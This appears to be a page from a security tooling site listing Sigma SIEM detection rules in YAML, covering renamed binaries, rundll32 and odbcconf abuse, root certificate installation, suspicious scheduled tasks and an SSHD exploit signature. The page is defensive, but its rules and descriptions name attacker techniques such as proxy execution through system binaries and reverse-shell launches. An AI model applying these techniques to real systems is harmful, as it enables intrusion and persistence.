Tool
SIEM
Sigma (generic) detection rules
1,492 rules indexed · SIEM-agnostic detection content
Sigma is the open generic signature format for SIEM systems. Expand any rule to see its raw YAML and convert it inline to native query syntax. Pick a platform above to browse every rule already rendered in that language.
Get the raw rules from SigmaHQ Detection Rules
The raw generic YAML, served by SigmaHQ. Pick a platform above to download a ready-to-deploy converted pack.
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
◈
Detection rules
50 shown of 1,492
medium
Renamed FTP.EXE Execution
Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
view Sigma YAML
title: Renamed FTP.EXE Execution
id: 277a4393-446c-449a-b0ed-7fdc7795244c
status: test
description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
references:
- https://lolbas-project.github.io/lolbas/Binaries/Ftp/
author: Victor Sergeev, oscd.community
date: 2020-10-09
modified: 2023-02-03
tags:
- attack.execution
- attack.stealth
- attack.t1059
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection_original:
OriginalFileName: 'ftp.exe'
filter_img:
Image|endswith: '\ftp.exe'
condition: selection_original and not filter_img
falsepositives:
- Unknown
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/info.yml
Convert to SIEM query
medium
Renamed Microsoft Teams Execution
Detects the execution of a renamed Microsoft Teams binary.
view Sigma YAML
title: Renamed Microsoft Teams Execution
id: 88f46b67-14d4-4f45-ac2c-d66984f22191
status: test
description: Detects the execution of a renamed Microsoft Teams binary.
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-07-12
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection:
OriginalFileName:
- 'msteams.exe'
- 'teams.exe'
filter_main_legit_names:
Image|endswith:
- '\msteams.exe'
- '\teams.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Renamed Remote Utilities RAT (RURAT) Execution
Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
view Sigma YAML
title: Renamed Remote Utilities RAT (RURAT) Execution
id: 9ef27c24-4903-4192-881a-3adde7ff92a5
status: test
description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
references:
- https://redcanary.com/blog/misbehaving-rats/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-19
modified: 2023-02-03
tags:
- attack.collection
- attack.command-and-control
- attack.discovery
- attack.stealth
- attack.s0592
logsource:
category: process_creation
product: windows
detection:
selection:
Product: 'Remote Utilities'
filter:
Image|endswith:
- '\rutserv.exe'
- '\rfusclient.exe'
condition: selection and not filter
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Replace.exe Usage
Detects the use of Replace.exe which can be used to replace file with another file
view Sigma YAML
title: Replace.exe Usage
id: 9292293b-8496-4715-9db6-37028dcda4b3
status: test
description: Detects the use of Replace.exe which can be used to replace file with another file
references:
- https://lolbas-project.github.io/lolbas/Binaries/Replace/
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace
author: frack113
date: 2022-03-06
modified: 2024-03-13
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\replace.exe'
argument:
CommandLine|contains|windash: '-a'
condition: selection and argument
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Response File Execution Via Odbcconf.EXE
Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
view Sigma YAML
title: Response File Execution Via Odbcconf.EXE
id: 5f03babb-12db-4eec-8c82-7b4cb5580868
related:
- id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5
type: similar
- id: 65d2be45-8600-4042-b4c0-577a1ff8a60e
type: obsolete
status: test
description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
references:
- https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16
- https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
- https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control
- https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-22
modified: 2024-03-05
tags:
- attack.stealth
- attack.t1218.008
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\odbcconf.exe'
- OriginalFileName: 'odbcconf.exe'
selection_cli:
CommandLine|contains|windash: ' -f '
selection_rsp_ext:
CommandLine|contains: '.rsp'
condition: all of selection_*
falsepositives:
- The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.
level: medium
Convert to SIEM query
medium
Rhadamanthys Stealer Module Launch Via Rundll32.EXE
Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
view Sigma YAML
title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE
id: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5
status: test
description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
references:
- https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88
- https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
- https://www.joesandbox.com/analysis/790122/0/html
- https://twitter.com/anfam17/status/1607477672057208835
author: TropChaud
date: 2023-01-26
modified: 2023-02-05
tags:
- attack.stealth
- attack.t1218.011
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_rundll32:
- OriginalFileName: 'RUNDLL32.EXE'
- Image|endswith: '\rundll32.exe'
selection_dll:
CommandLine|contains: 'nsis_uns'
selection_export_function:
CommandLine|contains: 'PrintUIEntry'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Root Account Enable Via Dsenableroot
Detects attempts to enable the root account via "dsenableroot"
view Sigma YAML
title: Root Account Enable Via Dsenableroot
id: 821bcf4d-46c7-4b87-bc57-9509d3ba7c11
status: test
description: Detects attempts to enable the root account via "dsenableroot"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md
- https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml
- https://ss64.com/osx/dsenableroot.html
author: Sohan G (D4rkCiph3r)
date: 2023-08-22
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1078
- attack.t1078.001
- attack.t1078.003
- attack.initial-access
- attack.persistence
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/dsenableroot'
filter_main_disable:
CommandLine|contains: ' -d '
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Root Certificate Installed - PowerShell
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
view Sigma YAML
title: Root Certificate Installed - PowerShell
id: 42821614-9264-4761-acfc-5772c3286f76
status: test
description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
author: 'oscd.community, @redcanary, Zach Stanford @svch0st'
date: 2020-10-10
modified: 2022-12-02
tags:
- attack.defense-impairment
- attack.t1553.004
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection1:
ScriptBlockText|contains|all:
- 'Move-Item'
- 'Cert:\LocalMachine\Root'
selection2:
ScriptBlockText|contains|all:
- 'Import-Certificate'
- 'Cert:\LocalMachine\Root'
condition: 1 of selection*
falsepositives:
- Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
level: medium
Convert to SIEM query
medium
Ruby Inline Command Execution
Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
view Sigma YAML
title: Ruby Inline Command Execution
id: 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8
status: test
description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-02
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\ruby.exe'
- OriginalFileName: 'ruby.exe'
selection_cli:
CommandLine|contains: ' -e'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Ruby on Rails Framework Exceptions
Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
view Sigma YAML
title: Ruby on Rails Framework Exceptions
id: 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a
status: stable
description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
references:
- http://edgeguides.rubyonrails.org/security.html
- http://guides.rubyonrails.org/action_controller_overview.html
- https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception
- https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb
author: Thomas Patzke
date: 2017-08-06
modified: 2020-09-01
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: ruby_on_rails
detection:
keywords:
- ActionController::InvalidAuthenticityToken
- ActionController::InvalidCrossOriginRequest
- ActionController::MethodNotAllowed
- ActionController::BadRequest
- ActionController::ParameterMissing
condition: keywords
falsepositives:
- Application bugs
level: medium
Convert to SIEM query
medium
Run Once Task Configuration in Registry
Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
view Sigma YAML
title: Run Once Task Configuration in Registry
id: c74d7efc-8826-45d9-b8bb-f04fac9e4eff
status: test
description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
references:
- https://twitter.com/pabraeken/status/990717080805789697
- https://lolbas-project.github.io/lolbas/Binaries/Runonce/
author: 'Avneet Singh @v3t0_, oscd.community'
date: 2020-11-15
modified: 2024-03-25
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
product: windows
category: registry_event
detection:
selection:
TargetObject|contains: '\Microsoft\Active Setup\Installed Components'
TargetObject|endswith: '\StubPath'
filter_optional_chrome:
Details|contains|all:
- 'C:\Program Files\Google\Chrome\Application\'
- '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called "--channel=stable" at the end
filter_optional_edge:
Details|contains:
- 'C:\Program Files (x86)\Microsoft\Edge\Application\'
- 'C:\Program Files\Microsoft\Edge\Application\'
Details|endswith: '\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Legitimate modification of the registry key by legitimate program
level: medium
Convert to SIEM query
medium
Rundll32 Execution With Uncommon DLL Extension
Detects the execution of rundll32 with a command line that doesn't contain a common extension
view Sigma YAML
title: Rundll32 Execution With Uncommon DLL Extension
id: c3a99af4-35a9-4668-879e-c09aeb4f2bdf
status: test
description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
references:
- https://twitter.com/mrd0x/status/1481630810495139841?s=12
author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
date: 2022-01-13
modified: 2024-04-04
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
filter_main_null:
CommandLine: null
filter_main_empty:
CommandLine: ''
filter_main_known_extension:
- CommandLine|contains:
# Note: This aims to cover: single and double quotes in addition to spaces and comma "," usage.
- '.cpl '
- '.cpl,'
- '.cpl"'
- ".cpl'"
- '.dll '
- '.dll,'
- '.dll"'
- ".dll'"
- '.inf '
- '.inf,'
- '.inf"'
- ".inf'"
- CommandLine|endswith:
# Note: This aims to cover: single and double quotes in addition to spaces and comma "," usage.
- '.cpl'
- '.dll'
- '.inf'
filter_main_localserver:
CommandLine|contains: ' -localserver '
filter_main_zzzzInvokeManagedCustomActionOutOfProc:
ParentImage|endswith: '\msiexec.exe'
CommandLine|contains|all:
- ':\Windows\Installer\'
- '.tmp'
- 'zzzzInvokeManagedCustomActionOutOfProc'
filter_optional_EdgeUpdate:
ParentCommandLine|contains|all:
- ':\Users\'
- '\AppData\Local\Microsoft\EdgeUpdate\Install\{'
- '\EDGEMITMP_'
- '.tmp\setup.exe'
- '--install-archive='
- '--previous-version='
- '--msedgewebview --verbose-logging --do-not-launch-msedge --user-level'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Rundll32 InstallScreenSaver Execution
An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
view Sigma YAML
title: Rundll32 InstallScreenSaver Execution
id: 15bd98ea-55f4-4d37-b09a-e7caa0fa2221
status: test
description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
references:
- https://lolbas-project.github.io/lolbas/Libraries/Desk/
- https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl
author: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec'
date: 2022-04-28
modified: 2023-02-09
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
selection_cli:
CommandLine|contains: 'InstallScreenSaver'
condition: all of selection_*
falsepositives:
- Legitimate installation of a new screensaver
level: medium
Convert to SIEM query
medium
Rundll32 Internet Connection
Detects a rundll32 that communicates with public IP addresses
view Sigma YAML
title: Rundll32 Internet Connection
id: cdc8da7d-c303-42f8-b08c-b4ab47230263
status: test
description: Detects a rundll32 that communicates with public IP addresses
references:
- https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2017-11-04
modified: 2024-03-13
tags:
- attack.stealth
- attack.t1218.011
- attack.execution
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\rundll32.exe'
Initiated: 'true'
filter_main_local_ranges:
DestinationIp|cidr:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '169.254.0.0/16'
- '::1/128' # IPv6 loopback
- 'fe80::/10' # IPv6 link-local addresses
- 'fc00::/7' # IPv6 private addresses
filter_main_ms_ranges:
DestinationIp|cidr:
- '20.0.0.0/8' # Microsoft range, caused some FPs
- '51.103.0.0/16' # Microsoft AS8075 range, caused some FPs
- '51.104.0.0/16' # Microsoft AS8075 range, caused some FPs
- '51.105.0.0/16' # Microsoft AS8075 range, caused some FPs
filter_main_app_sdb:
CommandLine|endswith: '\system32\PcaSvc.dll,PcaPatchSdbTask'
filter_main_azure_managed:
SourceHostname|endswith: '.internal.cloudapp.net'
filter_main_svchost_update_processes:
# Note: This require "ParentImage" data enrichment.
ParentImage: 'C:\Windows\System32\svchost.exe'
DestinationPort: 443
condition: selection and not 1 of filter_main_*
falsepositives:
- Communication to other corporate systems that use IP addresses from public address spaces
level: medium
Convert to SIEM query
medium
Rundll32 Spawned Via Explorer.EXE
Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
view Sigma YAML
title: Rundll32 Spawned Via Explorer.EXE
id: 1723e720-616d-4ddc-ab02-f7e3685a4713
status: test
description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
references:
- https://redcanary.com/blog/raspberry-robin/
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/
author: CD_ROM_
date: 2022-05-21
modified: 2023-08-31
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
selection_img:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
filter_main_generic:
- CommandLine|contains: ' C:\Windows\System32\' # The space at the start is required
- CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' # Windows 10 volume control
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
view Sigma YAML
title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
id: d81a9fc6-55db-4461-b962-0e78fea5b0ad
related:
- id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed rundll32
type: similar
status: test
description: |
Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
references:
- https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
- https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior
- https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver
author: Andreas Braathen (mnemonic.io)
date: 2023-10-17
tags:
- attack.stealth
- attack.t1218
- detection.threat-hunting
logsource:
category: process_creation
product: windows
detection:
selection_image:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
selection_cmdline:
CommandLine|contains: 'DllRegisterServer'
filter_main_legit_paths:
CommandLine|contains:
- ':\Program Files (x86)'
- ':\Program Files\'
- ':\Windows\System32\'
- ':\Windows\SysWOW64\'
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Legitimate usage as part of application installation, but less likely from e.g. temporary paths.
- Not every instance is considered malicious, but this rule will capture the malicious usages.
level: medium
Convert to SIEM query
medium
SCM Database Handle Failure
Detects non-system users failing to get a handle of the SCM database.
view Sigma YAML
title: SCM Database Handle Failure
id: 13addce7-47b2-4ca0-a98f-1de964d1d669
status: test
description: Detects non-system users failing to get a handle of the SCM database.
references:
- https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-08-12
modified: 2022-07-11
tags:
- attack.discovery
- attack.t1010
logsource:
product: windows
service: security
detection:
selection:
EventID: 4656
ObjectType: 'SC_MANAGER OBJECT'
ObjectName: 'ServicesActive'
AccessMask: '0xf003f' # is used in the reference; otherwise too many FPs
# Keywords: 'Audit Failure' <-> in the ref 'Keywords':-9214364837600034816
filter:
SubjectLogonId: '0x3e4'
condition: selection and not filter
falsepositives:
- Unknown
# triggering on many hosts in some environments
level: medium
Convert to SIEM query
medium
SCM Database Privileged Operation
Detects non-system users performing privileged operation os the SCM database
view Sigma YAML
title: SCM Database Privileged Operation
id: dae8171c-5ec6-4396-b210-8466585b53e9
status: test
description: Detects non-system users performing privileged operation os the SCM database
references:
- https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
date: 2019-08-15
modified: 2022-09-18
tags:
- attack.privilege-escalation
- attack.t1548
logsource:
product: windows
service: security
detection:
selection:
EventID: 4674
ObjectType: 'SC_MANAGER OBJECT'
ObjectName: 'servicesactive'
PrivilegeList: 'SeTakeOwnershipPrivilege'
filter:
SubjectLogonId: '0x3e4'
ProcessName|endswith: ':\Windows\System32\services.exe'
condition: selection and not filter
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
SCR File Write Event
Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
view Sigma YAML
title: SCR File Write Event
id: c048f047-7e2a-4888-b302-55f509d4a91d
status: test
description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
references:
- https://lolbas-project.github.io/lolbas/Libraries/Desk/
author: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io'
date: 2022-04-27
modified: 2023-08-23
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith: '.scr'
filter:
TargetFilename|contains:
- ':\$WINDOWS.~BT\NewOS\'
- ':\Windows\System32\'
- ':\Windows\SysWOW64\'
- ':\Windows\WinSxS\'
- ':\WUDownloadCache\' # Windows Update Download Cache
condition: selection and not filter
falsepositives:
- The installation of new screen savers by third party software
level: medium
Convert to SIEM query
medium
SES Identity Has Been Deleted
Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
view Sigma YAML
title: SES Identity Has Been Deleted
id: 20f754db-d025-4a8f-9d74-e0037e999a9a
status: test
description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
references:
- https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
author: Janantha Marasinghe
date: 2022-12-13
modified: 2022-12-28
tags:
- attack.stealth
- attack.t1070
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'ses.amazonaws.com'
eventName: 'DeleteIdentity'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
SMB Spoolss Name Piped Usage
Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
view Sigma YAML
title: SMB Spoolss Name Piped Usage
id: bae2865c-5565-470d-b505-9496c87d0c30
status: test
description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
references:
- https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
- https://dirkjanm.io/a-different-way-of-abusing-zerologon/
- https://twitter.com/_dirkjan/status/1309214379003588608
author: OTR (Open Threat Research), @neu5ron
date: 2018-11-28
modified: 2022-10-09
tags:
- attack.lateral-movement
- attack.t1021.002
logsource:
product: zeek
service: smb_files
detection:
selection:
path|endswith: 'IPC$'
name: spoolss
condition: selection
falsepositives:
- Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too
level: medium
Convert to SIEM query
medium
SMB over QUIC Via Net.EXE
Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
view Sigma YAML
title: SMB over QUIC Via Net.EXE
id: 2238d337-42fb-4971-9a68-63570f2aede4
related:
- id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae
type: similar
status: test
description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md
- https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/
author: frack113
date: 2023-07-21
tags:
- attack.lateral-movement
- attack.t1570
- detection.threat-hunting
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\net.exe'
- '\net1.exe'
- OriginalFileName:
- 'net.exe'
- 'net1.exe'
selection_cli:
CommandLine|contains: '/TRANSPORT:QUIC'
condition: all of selection_*
falsepositives:
- Administrative activity
level: medium
Convert to SIEM query
medium
SMB over QUIC Via PowerShell Script
Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
view Sigma YAML
title: SMB over QUIC Via PowerShell Script
id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae
related:
- id: 2238d337-42fb-4971-9a68-63570f2aede4
type: similar
status: test
description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
references:
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md
- https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps
- https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/
author: frack113
date: 2023-07-21
tags:
- attack.lateral-movement
- attack.t1570
- detection.threat-hunting
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'New-SmbMapping'
- '-TransportType QUIC'
condition: selection
falsepositives:
- Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts.
level: medium
Convert to SIEM query
medium
SQL Client Tools PowerShell Session Detection
This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
view Sigma YAML
title: SQL Client Tools PowerShell Session Detection
id: a746c9b8-a2fb-4ee5-a428-92bee9e99060
status: test
description: |
This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
references:
- https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml
- https://twitter.com/pabraeken/status/993298228840992768
author: 'Agro (@agro_sev) oscd.communitly'
date: 2020-10-13
modified: 2022-02-25
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1127
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\sqltoolsps.exe'
- ParentImage|endswith: '\sqltoolsps.exe'
- OriginalFileName: '\sqltoolsps.exe'
filter:
ParentImage|endswith: '\smss.exe'
condition: selection and not filter
falsepositives:
- Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.
level: medium
Convert to SIEM query
medium
SSHD Error Message CVE-2018-15473
Detects exploitation attempt using public exploit code for CVE-2018-15473
view Sigma YAML
title: SSHD Error Message CVE-2018-15473
id: 4c9d903d-4939-4094-ade0-3cb748f4d7da
status: test
description: Detects exploitation attempt using public exploit code for CVE-2018-15473
references:
- https://github.com/Rhynorater/CVE-2018-15473-Exploit
author: Florian Roth (Nextron Systems)
date: 2017-08-24
modified: 2021-11-27
tags:
- attack.reconnaissance
- attack.t1589
- cve.2018-15473
- detection.emerging-threats
logsource:
product: linux
service: sshd
detection:
keywords:
- 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]'
condition: keywords
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
view Sigma YAML
title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
id: 81325ce1-be01-4250-944f-b4789644556f
related:
- id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline
type: derived
status: test
description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
references:
- https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
- https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04
- https://blog.talosintelligence.com/gophish-powerrat-dcrat/
author: Florian Roth (Nextron Systems)
date: 2022-02-21
modified: 2025-10-07
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_1_create:
Image|endswith: '\schtasks.exe'
CommandLine|contains|windash: ' /create '
selection_1_all_folders:
CommandLine|contains:
- ':\Perflogs'
- ':\Users\All Users\'
- ':\Users\Default\'
- ':\Users\Public'
- ':\Windows\Temp'
- '\AppData\Local\'
- '\AppData\Roaming\'
- '%AppData%'
- '%Public%'
selection_2_parent:
ParentCommandLine|endswith: '\svchost.exe -k netsvcs -p -s Schedule'
selection_2_some_folders:
CommandLine|contains:
- ':\Perflogs'
- ':\Windows\Temp'
- '\Users\Public'
- '%Public%'
filter_optional_other:
- ParentCommandLine|contains: 'unattended.ini'
- CommandLine|contains: 'update_task.xml'
filter_optional_team_viewer:
CommandLine|contains: '/Create /TN TVInstallRestore /TR'
filter_optional_avira_install:
# Comment out this filter if you dont use AVIRA
CommandLine|contains|all:
- '/Create /Xml '
- '\Temp\.CR.'
- '\Avira_Security_Installation.xml'
filter_optional_avira_other:
# Comment out this filter if you dont use AVIRA
CommandLine|contains|all:
- '/Create /F /TN'
- '/Xml '
- '\Temp\'
- 'Avira_'
CommandLine|contains:
- '.tmp\UpdateFallbackTask.xml'
- '.tmp\WatchdogServiceControlManagerTimeout.xml'
- '.tmp\SystrayAutostart.xml'
- '.tmp\MaintenanceTask.xml'
filter_optional_klite_codec:
CommandLine|contains|all:
- '\Temp\'
- '/Create /TN "klcp_update" /XML '
- '\klcp_update_task.xml'
condition: ( all of selection_1_* or all of selection_2_* ) and not 1 of filter_optional_*
falsepositives:
- Benign scheduled tasks creations or executions that happen often during software installations
